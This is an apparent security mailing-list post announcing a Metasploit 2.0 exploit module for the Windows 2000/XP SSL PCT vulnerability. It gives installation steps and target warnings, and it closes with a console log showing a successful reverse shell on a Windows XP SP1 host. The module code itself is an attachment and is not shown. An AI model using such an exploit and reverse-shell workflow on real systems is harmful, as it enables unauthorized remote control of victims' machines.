Attached is an exploit module for version 2.0 of the Metasploit Framework. This module was based on Johnny Cyberpunk's code and includes some interesting improvements: - Targets for Windows 2000 and Windows XP - SSL request modified to allow exploitation on Windows XP - Use of ExitThread allows repeatable exploitation - Shellcode is limited to 1800 bytes or so... To use this module, copy the attached file into the "exploits" subdirectory of the Metasploit Framework 2.0 installation. Win32 users should copy this file into $BASE\home\framework-2.0\exploits, where $BASE is where you installed the Framework. If for some reason you don't have the Metasploit Framework installed, grab it from the following URL: http://metasploit.com/projects/Framework/ If you specify the wrong offset, LSASS will stop functioning (but not crash!), so make sure you know your targets. This module has been tested against most Windows 2000 and Windows XP versions (English only, sorry). Cheers, HD and spoonm ______________________________________ msf iis5x_ssl_pct(winreverse_stg) > exploit [*] Starting Reverse Handler. [*] Attempting to exploit target Windows XP SP1 [*] Sending 329 bytes to remote host. [*] Waiting for a response... [*] Got connection from 192.168.50.98:1038 [*] Sending Stage (115 bytes) Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>
Attachment:
iis5x_ssl_pct.pm
Description: application/perl-module